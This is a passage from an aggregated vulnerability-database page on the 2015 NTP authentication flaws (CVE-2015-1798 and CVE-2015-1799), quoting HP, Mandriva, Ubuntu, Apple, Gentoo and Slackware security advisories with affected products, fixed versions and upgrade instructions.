- HP Network Products
- JG404A HP MSR3064 Router
- JG405A HP MSR3044 Router
- JG406A HP MSR3024 AC Router
- JG407A HP MSR3024 DC Router
- JG408A HP MSR3024 PoE Router
- JG409A HP MSR3012 AC Router
- JG410A HP MSR3012 DC Router
- JG861A HP MSR3024 TAA-compliant AC Router
-
MSR4000 (Comware 7) - Version: Fix in R0106P33
- HP Network Products
- JG402A HP MSR4080 Router Chassis
- JG403A HP MSR4060 Router Chassis
- JG412A HP MSR4000 MPU-100 Main Processing Unit
- JG869A HP MSR4000 TAA-compliant MPU-100 Main Processing Unit
-
5800 (Comware 7) - Version: Fix in R7006P15
- HP Network Products
- JC099A HP 5800-24G-PoE Switch
- JC099B HP 5800-24G-PoE+ Switch
- JC100A HP 5800-24G Switch
- JC100B HP 5800-24G Switch
- JC101A HP 5800-48G Switch with 2 Slots
- JC101B HP 5800-48G-PoE+ Switch with 2 Interface Slots
- JC103A HP 5800-24G-SFP Switch
- JC103B HP 5800-24G-SFP Switch with 1 Interface Slot
- JC104A HP 5800-48G-PoE Switch
- JC104B HP 5800-48G-PoE+ Switch with 1 Interface Slot
- JC105A HP 5800-48G Switch
- JC105B HP 5800-48G Switch with 1 Interface Slot
- JG254A HP 5800-24G-PoE+ TAA-compliant Switch
- JG254B HP 5800-24G-PoE+ TAA-compliant Switch
- JG255A HP 5800-24G TAA-compliant Switch
- JG255B HP 5800-24G TAA-compliant Switch
- JG256A HP 5800-24G-SFP TAA-compliant Switch with 1 Interface
- JG256B HP 5800-24G-SFP TAA-compliant Switch with 1 Interface
- JG257A HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface
- JG257B HP 5800-48G-PoE+ TAA-compliant Switch with 1 Interface
- JG258A HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG258B HP 5800-48G TAA-compliant Switch with 1 Interface Slot
- JG225A HP 5800AF-48G Switch
- JG225B HP 5800AF-48G Switch
- JG242A HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface
- JG242B HP 5800-48G-PoE+ TAA-compliant Switch with 2 Interface
- JG243A HP 5820-24XG-SFP+ TAA-compliant Switch
- JG243B HP 5820-24XG-SFP+ TAA-compliant Switch
- JG259A HP 5820X-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots & 1 OAA Slot
- JG259B HP 5820-14XG-SFP+ TAA-compliant Switch with 2 Interface Slots and 1 OAA Slot
- JC106A HP 5820-14XG-SFP+ Switch with 2 Slots
- JC106B HP 5820-14XG-SFP+ Switch with 2 Interface Slots & 1 OAA Slot
- JG219A HP 5820AF-24XG Switch
- JG219B HP 5820AF-24XG Switch
- JC102A HP 5820-24XG-SFP+ Switch
- JC102B HP 5820-24XG-SFP+ Switch
-
VSR (Comware 7) - Version: Fix in E0321
- HP Network Products
- JG810AAE HP VSR1001 Virtual Services Router 60 Day Evaluation Software
- JG811AAE HP VSR1001 Comware 7 Virtual Services Router
- JG812AAE HP VSR1004 Comware 7 Virtual Services Router
- JG813AAE HP VSR1008 Comware 7 Virtual Services Router
-
7900 (Comware 7) - Version: Fix in R2137
- HP Network Products
- JG682A HP FlexFabric 7904 Switch Chassis
- JG841A HP FlexFabric 7910 Switch Chassis
- JG842A HP FlexFabric 7910 7.2Tbps Fabric / Main Processing Unit
- JH001A HP FlexFabric 7910 2.4Tbps Fabric / Main Processing Unit
- JH122A HP FlexFabric 7904 TAA-compliant Switch Chassis
- JH123A HP FlexFabric 7910 TAA-compliant Switch Chassis
- JH124A HP FlexFabric 7910 7.2Tbps TAA-compliant Fabric/Main Processing Unit
- JH125A HP FlexFabric 7910 2.4Tbps TAA-compliant Fabric/Main Processing Unit
-
5130 (Comware 7) - Version: Fix in R3109P05
- HP Network Products
- JG932A HP 5130-24G-4SFP+ EI Switch
- JG933A HP 5130-24G-SFP-4SFP+ EI Switch
- JG934A HP 5130-48G-4SFP+ EI Switch
- JG936A HP 5130-24G-PoE+-4SFP+ (370W) EI Switch
- JG937A HP 5130-48G-PoE+-4SFP+ (370W) EI Switch
- JG975A HP 5130-24G-4SFP+ EI Brazil Switch
- JG976A HP 5130-48G-4SFP+ EI Brazil Switch
- JG977A HP 5130-24G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG978A HP 5130-48G-PoE+-4SFP+ (370W) EI Brazil Switch
- JG938A HP 5130-24G-2SFP+-2XGT EI Switch
- JG939A HP 5130-48G-2SFP+-2XGT EI Switch
- JG940A HP 5130-24G-PoE+-2SFP+-2XGT (370W) EI Switch
- JG941A HP 5130-48G-PoE+-2SFP+-2XGT (370W) EI Switch
-
5700 (Comware 7) - Version: Fix in R2422P01
- HP Network Products
- JG894A HP FlexFabric 5700-48G-4XG-2QSFP+ Switch
- JG895A HP FlexFabric 5700-48G-4XG-2QSFP+ TAA-compliant Switch
- JG896A HP FlexFabric 5700-40XG-2QSFP+ Switch
- JG897A HP FlexFabric 5700-40XG-2QSFP+ TAA-compliant Switch
- JG898A HP FlexFabric 5700-32XGT-8XG-2QSFP+ Switch
- JG899A HP FlexFabric 5700-32XGT-8XG-2QSFP+ TAA-compliant Switch
-
5930 (Comware 7) - Version: Fix in R2422P01
- HP Network Products
- JG726A HP FlexFabric 5930 32QSFP+ Switch
- JG727A HP FlexFabric 5930 32QSFP+ TAA-compliant Switch
- JH178A HP FlexFabric 5930 2QSFP+ 2-slot Switch
- JH179A HP FlexFabric 5930 4-slot Switch
- JH187A HP FlexFabric 5930 2QSFP+ 2-slot TAA-compliant Switch
- JH188A HP FlexFabric 5930 4-slot TAA-compliant Switch
HISTORY Version:1 (rev.1) - 8 March 2016 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running Hewlett Packard Enterprise (HPE) software products should be applied in accordance with the customer's patch management policy. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDVSA-2015:202 http://www.mandriva.com/en/support/security/
Package : ntp Date : April 10, 2015 Affected: Business Server 1.0, Business Server 2.0
Problem Description:
Multiple vulnerabilities has been found and corrected in ntp:
The symmetric-key feature in the receive function in ntp_proto.c in ntpd in NTP before 4.2.8p2 requires a correct MAC only if the MAC field has a nonzero length, which makes it easier for man-in-the-middle attackers to spoof packets by omitting the MAC (CVE-2015-1798).
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799 http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities
Updated Packages:
Mandriva Business Server 1/X86_64: b0f98e6b8700e3e3413582fe28d1ba06 mbs1/x86_64/ntp-4.2.6p5-8.4.mbs1.x86_64.rpm d864780718c95368bf9ec81643e35e5d mbs1/x86_64/ntp-client-4.2.6p5-8.4.mbs1.x86_64.rpm 6f457df52d46fb8e6b0fe44aead752eb mbs1/x86_64/ntp-doc-4.2.6p5-8.4.mbs1.x86_64.rpm b4bff3de733ea6d2839a77a9211ce02b mbs1/SRPMS/ntp-4.2.6p5-8.4.mbs1.src.rpm
Mandriva Business Server 2/X86_64: e9ac2f3465bcc50199aef8a4d553927f mbs2/x86_64/ntp-4.2.6p5-16.3.mbs2.x86_64.rpm cf2970c3c56efbfa84f964532ad64544 mbs2/x86_64/ntp-client-4.2.6p5-16.3.mbs2.x86_64.rpm 1ae1b1d3c2e7bdea25c01c33652b6169 mbs2/x86_64/ntp-doc-4.2.6p5-16.3.mbs2.noarch.rpm d250433009fd187361bda6338dc5eede mbs2/SRPMS/ntp-4.2.6p5-16.3.mbs2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. ============================================================================ Ubuntu Security Notice USN-2567-1 April 13, 2015
ntp vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in NTP. A remote attacker could possibly use this issue to bypass authentication and spoof packets. (CVE-2015-1799)
Juergen Perlinger discovered that NTP incorrectly generated MD5 keys on big-endian platforms. This issue could either cause ntp-keygen to hang, or could result in non-random keys. (CVE number pending)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.10: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.10.3
Ubuntu 14.04 LTS: ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.3
Ubuntu 12.04 LTS: ntp 1:4.2.6.p3+dfsg-1ubuntu3.4
In general, a standard system update will make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-2567-1 CVE-2015-1798, CVE-2015-1799
Package Information: https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.10.3 https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.3 https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.4 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
APPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update 2015-005
OS X Yosemite v10.10.4 and Security Update 2015-005 are now available and address the following:
Admin Framework Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A process may gain admin privileges without proper authentication Description: An issue existed when checking XPC entitlements. This issue was addressed through improved entitlement checking. CVE-ID CVE-2015-3671 : Emil Kvarnhammar at TrueSec
Admin Framework Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A non-admin user may obtain admin rights Description: An issue existed in the handling of user authentication. This issue was addressed through improved error checking. CVE-ID CVE-2015-3672 : Emil Kvarnhammar at TrueSec
Admin Framework Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker may abuse Directory Utility to gain root privileges Description: Directory Utility was able to be moved and modified to achieve code execution within an entitled process. This issue was addressed by limiting the disk location that writeconfig clients may be executed from. CVE-ID CVE-2015-3673 : Patrick Wardle of Synack, Emil Kvarnhammar at TrueSec
afpserver Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the AFP server. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3674 : Dean Jerkovich of NCC Group
apache Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker may be able to access directories that are protected with HTTP authentication without knowing the correct credentials Description: The default Apache configuration did not include mod_hfs_apple. If Apache was manually enabled and the configuration was not changed, some files that should not be accessible might have been accessible using a specially crafted URL. This issue was addressed by enabling mod_hfs_apple. CVE-ID CVE-2015-3675 : Apple
apache Available for: OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple vulnerabilities exist in PHP, the most serious of which may lead to arbitrary code execution Description: Multiple vulnerabilities existed in PHP versions prior to 5.5.24 and 5.4.40. These were addressed by updating PHP to versions 5.5.24 and 5.4.40. CVE-ID CVE-2015-0235 CVE-2015-0273
AppleGraphicsControl Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in AppleGraphicsControl which could have led to the disclosure of kernel memory layout. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-3676 : Chen Liang of KEEN Team
AppleFSCompression Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in LZVN compression that could have led to the disclosure of kernel memory content. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3677 : an anonymous researcher working with HP's Zero Day Initiative
AppleThunderboltEDMService Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the handling of certain Thunderbolt commands from local processes. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3678 : Apple
ATS Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in handling of certain fonts. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3679 : Pawel Wylecial working with HP's Zero Day Initiative CVE-2015-3680 : Pawel Wylecial working with HP's Zero Day Initiative CVE-2015-3681 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3682 : Nuode Wei
Bluetooth Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in the Bluetooth HCI interface. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3683 : Roberto Paleari and Aristide Fattori of Emaze Networks
Certificate Trust Policy Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: An attacker with a privileged network position may be able to intercept network traffic Description: An intermediate certificate was incorrectly issued by the certificate authority CNNIC. This issue was addressed through the addition of a mechanism to trust only a subset of certificates issued prior to the mis-issuance of the intermediate. Further details are available at https://support.apple.com/en-us/HT204938
Certificate Trust Policy Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Description: The certificate trust policy was updated. The complete list of certificates may be viewed at https://support.apple.com/en- us/HT202858.
CFNetwork HTTPAuthentication Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Following a maliciously crafted URL may lead to arbitrary code execution Description: A memory corruption issue existed in handling of certain URL credentials. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3684 : Apple
CoreText Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted text file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in the processing of text files. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-1157 CVE-2015-3685 : Apple CVE-2015-3686 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3687 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3688 : John Villamil (@day6reak), Yahoo Pentest Team CVE-2015-3689 : Apple
coreTLS Available for: OS X Yosemite v10.10 to v10.10.3 Impact: An attacker with a privileged network position may intercept SSL/TLS connections Description: coreTLS accepted short ephemeral Diffie-Hellman (DH) keys, as used in export-strength ephemeral DH cipher suites. This issue, also known as Logjam, allowed an attacker with a privileged network position to downgrade security to 512-bit DH if the server supported an export-strength ephemeral DH cipher suite. The issue was addressed by increasing the default minimum size allowed for DH ephemeral keys to 768 bits. CVE-ID CVE-2015-4000 : The weakdh team at weakdh.org, Hanno Boeck
DiskImages Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An information disclosure issue existed in the processing of disk images. This issue was addressed through improved memory management. CVE-ID CVE-2015-3690 : Peter Rutenbar working with HP's Zero Day Initiative
Display Drivers Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An issue existed in the Monitor Control Command Set kernel extension by which a userland process could control the value of a function pointer within the kernel. The issue was addressed by removing the affected interface. CVE-ID CVE-2015-3691 : Roberto Paleari and Aristide Fattori of Emaze Networks
EFI Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application with root privileges may be able to modify EFI flash memory Description: An insufficient locking issue existed with EFI flash when resuming from sleep states. This issue was addressed through improved locking. CVE-ID CVE-2015-3692 : Trammell Hudson of Two Sigma Investments, Xeno Kovah and Corey Kallenberg of LegbaCore LLC, Pedro Vilaca
EFI Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may induce memory corruption to escalate privileges Description: A disturbance error, also known as Rowhammer, exists with some DDR3 RAM that could have led to memory corruption. This issue was mitigated by increasing memory refresh rates. CVE-ID CVE-2015-3693 : Mark Seaborn and Thomas Dullien of Google, working from original research by Yoongu Kim et al (2014)
FontParser Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-3694 : John Villamil (@day6reak), Yahoo Pentest Team
Graphics Driver Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: An out of bounds write issue existed in NVIDIA graphics driver. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-3712 : Ian Beer of Google Project Zero
Intel Graphics Driver Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple buffer overflow issues exist in the Intel graphics driver, the most serious of which may lead to arbitrary code execution with system privileges Description: Multiple buffer overflow issues existed in the Intel graphics driver. These were addressed through additional bounds checks. CVE-ID CVE-2015-3695 : Ian Beer of Google Project Zero CVE-2015-3696 : Ian Beer of Google Project Zero CVE-2015-3697 : Ian Beer of Google Project Zero CVE-2015-3698 : Ian Beer of Google Project Zero CVE-2015-3699 : Ian Beer of Google Project Zero CVE-2015-3700 : Ian Beer of Google Project Zero CVE-2015-3701 : Ian Beer of Google Project Zero CVE-2015-3702 : KEEN Team
ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Multiple vulnerabilities existed in libtiff, the most serious of which may lead to arbitrary code execution Description: Multiple vulnerabilities existed in libtiff versions prior to 4.0.4. They were addressed by updating libtiff to version 4.0.4. CVE-ID CVE-2014-8127 CVE-2014-8128 CVE-2014-8129 CVE-2014-8130
ImageIO Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted .tiff file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of .tiff files. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-3703 : Apple
Install Framework Legacy Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Several issues existed in how Install.framework's 'runner' setuid binary dropped privileges. This was addressed by properly dropping privileges. CVE-ID CVE-2015-3704 : Ian Beer of Google Project Zero
IOAcceleratorFamily Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in IOAcceleratorFamily. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3705 : KEEN Team CVE-2015-3706 : KEEN Team
IOFireWireFamily Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple null pointer dereference issues existed in the FireWire driver. These issues were addressed through improved error checking. CVE-ID CVE-2015-3707 : Roberto Paleari and Aristide Fattori of Emaze Networks
Kernel Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: A memory management issue existed in the handling of APIs related to kernel extensions which could have led to the disclosure of kernel memory layout. This issue was addressed through improved memory management. CVE-ID CVE-2015-3720 : Stefan Esser
Kernel Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: A memory management issue existed in the handling of HFS parameters which could have led to the disclosure of kernel memory layout. This issue was addressed through improved memory management. CVE-ID CVE-2015-3721 : Ian Beer of Google Project Zero
kext tools Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to overwrite arbitrary files Description: kextd followed symbolic links while creating a new file. This issue was addressed through improved handling of symbolic links. CVE-ID CVE-2015-3708 : Ian Beer of Google Project Zero
kext tools Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A local user may be able to load unsigned kernel extensions Description: A time-of-check time-of-use (TOCTOU) race condition condition existed while validating the paths of kernel extensions. This issue was addressed through improved checks to validate the path of the kernel extensions. CVE-ID CVE-2015-3709 : Ian Beer of Google Project Zero
Mail Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A maliciously crafted email can replace the message content with an arbitrary webpage when the message is viewed Description: An issue existed in the support for HTML email which allowed message content to be refreshed with an arbitrary webpage. The issue was addressed through restricted support for HTML content. CVE-ID CVE-2015-3710 : Aaron Sigel of vtty.com, Jan Soucek
ntfs Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in NTFS that could have led to the disclosure of kernel memory content. This issue was addressed through improved memory handling. CVE-ID CVE-2015-3711 : Peter Rutenbar working with HP's Zero Day Initiative
ntp Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: An attacker in a privileged position may be able to perform a denial of service attack against two ntp clients Description: Multiple issues existed in the authentication of ntp packets being received by configured end-points. These issues were addressed through improved connection state management. CVE-ID CVE-2015-1798 CVE-2015-1799
OpenSSL Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Multiple issues exist in OpenSSL, including one that may allow an attacker to intercept connections to a server that supports export-grade ciphers Description: Multiple issues existed in OpenSSL 0.9.8zd which were addressed by updating OpenSSL to version 0.9.8zf. CVE-ID CVE-2015-0209 CVE-2015-0286 CVE-2015-0287 CVE-2015-0288 CVE-2015-0289 CVE-2015-0293
QuickTime Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in QuickTime. These issues were addressed through improved memory handling. CVE-ID CVE-2015-3661 : G. Geshev working with HP's Zero Day Initiative CVE-2015-3662 : kdot working with HP's Zero Day Initiative CVE-2015-3663 : kdot working with HP's Zero Day Initiative CVE-2015-3666 : Steven Seeley of Source Incite working with HP's Zero Day Initiative CVE-2015-3667 : Ryan Pentney, Richard Johnson of Cisco Talos and Kai Lu of Fortinet's FortiGuard Labs, Ryan Pentney, and Richard Johnson of Cisco Talos and Kai Lu of Fortinet's FortiGuard Labs CVE-2015-3668 : Kai Lu of Fortinet's FortiGuard Labs CVE-2015-3713 : Apple
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: An integer overflow existed in the Security framework code for parsing S/MIME e-mail and some other signed or encrypted objects. This issue was addressed through improved validity checking. CVE-ID CVE-2013-1741
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Tampered applications may not be prevented from launching Description: Apps using custom resource rules may have been susceptible to tampering that would not have invalidated the signature. This issue was addressed with improved resource validation. CVE-ID CVE-2015-3714 : Joshua Pitts of Leviathan Security Group
Security Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: A malicious application may be able to bypass code signing checks Description: An issue existed where code signing did not verify libraries loaded outside the application bundle. This issue was addressed with improved bundle verification. CVE-ID CVE-2015-3715 : Patrick Wardle of Synack
Spotlight Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite v10.10 to v10.10.3 Impact: Searching for a malicious file with Spotlight may lead to command injection Description: A command injection vulnerability existed in the handling of filenames of photos added to the local photo library. This issue was addressed through improved input validation. CVE-ID CVE-2015-3716 : Apple
SQLite Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A remote attacker may cause an unexpected application termination or arbitrary code execution Description: Multiple buffer overflows existed in SQLite's printf implementation. These issues were addressed through improved bounds checking. CVE-ID CVE-2015-3717 : Peter Rutenbar working with HP's Zero Day Initiative
System Stats Available for: OS X Yosemite v10.10 to v10.10.3 Impact: A malicious app may be able to compromise systemstatsd Description: A type confusion issue existed in systemstatsd's handling of interprocess communication. By sending a maliciously formatted message to systemstatsd, it may have been possible to execute arbitrary code as the systemstatsd process. The issue was addressed through additional type checking. CVE-ID CVE-2015-3718 : Roberto Paleari and Aristide Fattori of Emaze Networks
TrueTypeScaler Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-3719 : John Villamil (@day6reak), Yahoo Pentest Team
zip Available for: OS X Yosemite v10.10 to v10.10.3 Impact: Extracting a maliciously crafted zip file using the unzip tool may lead to an unexpected application termination or arbitrary code execution Description: Multiple memory corruption issues existed in the handling of zip files. These issues were addressed through improved memory handling. CVE-ID
CVE-2014-8139 CVE-2014-8140 CVE-2014-8141
OS X Yosemite 10.10.4 includes the security content of Safari 8.0.7. https://support.apple.com/en-us/HT204950
OS X Yosemite 10.10.4 and Security Update 2015-005 may be obtained from the Mac App Store or Apple's Software Downloads web site: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: http://support.apple.com/kb/HT1222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
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Show details on source website{
"affected_products": {
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"data": [
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"db": "CERT/CC",
"id": "VU#374268"
},
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"db": "BID",
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"id": "JVNDB-2015-002116"
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},
"description": {
"_id": null,
"data": "The symmetric-key feature in the receive function in ntp_proto.c in ntpd in NTP 3.x and 4.x before 4.2.8p2 performs state-variable updates upon receiving certain invalid packets, which makes it easier for man-in-the-middle attackers to cause a denial of service (synchronization loss) by spoofing the source IP address of a peer. NTP Project ntpd reference implementation accepts unauthenticated packets with symmetric key cryptography and does not protect symmetric associations against denial of service attacks. NTP of ntpd of ntp_proto.c Inside receive of symmetric-key The function is used even when a specific invalid packet is received. state variable Service operation disruption to perform update ( Sync failure ) There are vulnerabilities that are put into a state. Supplementary information : CWE Vulnerability type by CWE-17: Code ( code ) Has been identified. http://cwe.mitre.org/data/definitions/17.htmlMan-in-the-middle attacks (man-in-the-middle attack) By the source of the peer IP Denial of service by spoofing addresses ( Sync failure ) There is a possibility of being put into a state. NTP is prone to a denial-of-service vulnerability. \nSuccessful exploits may allow the attacker to cause a denial-of-service condition. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\nGentoo Linux Security Advisory GLSA 201509-01\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n https://security.gentoo.org/\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\n Severity: Normal\n Title: NTP: Multiple vulnerablities\n Date: September 24, 2015\n Bugs: #545836, #553682\n ID: 201509-01\n\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n\nSynopsis\n========\n\nMultiple vulnerabilities have been found in NTP, the worst of which\ncould lead to arbitrary code execution. \n\nBackground\n==========\n\nNTP contains software for the Network Time Protocol. \n\nAffected packages\n=================\n\n -------------------------------------------------------------------\n Package / Vulnerable / Unaffected\n -------------------------------------------------------------------\n 1 net-misc/ntp \u003c 4.2.8_p3 \u003e= 4.2.8_p3\n\nDescription\n===========\n\nMultiple vulnerabilities have been discovered in NTP. Please review the\nCVE identifiers referenced below for details. \n\nWorkaround\n==========\n\nThere is no known workaround at this time. \n\nResolution\n==========\n\nAll NTP users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose \"\u003e=net-misc/ntp-4.2.8_p3\"\n\nReferences\n==========\n\n[ 1 ] CVE-2015-1798\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1798\n[ 2 ] CVE-2015-1799\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1799\n[ 3 ] CVE-2015-5146\n http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-5146\n\nAvailability\n============\n\nThis GLSA and any updates to it are available for viewing at\nthe Gentoo Security Website:\n\n https://security.gentoo.org/glsa/201509-01\n\nConcerns?\n=========\n\nSecurity is a primary focus of Gentoo Linux and ensuring the\nconfidentiality and security of our users\u0027 machines is of utmost\nimportance to us. Any security concerns should be addressed to\nsecurity@gentoo.org or alternatively, you may file a bug at\nhttps://bugs.gentoo.org. \n\nLicense\n=======\n\nCopyright 2015 Gentoo Foundation, Inc; referenced text\nbelongs to its owner(s). \n\nThe contents of this document are licensed under the\nCreative Commons - Attribution / Share Alike license. \n\nhttp://creativecommons.org/licenses/by-sa/2.5\n. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/ntp-4.2.8p2-i486-1_slack14.1.txz: Upgraded. \n * Authentication doesn\u0027t protect symmetric associations against DoS attacks. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p2-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p2-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p2-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 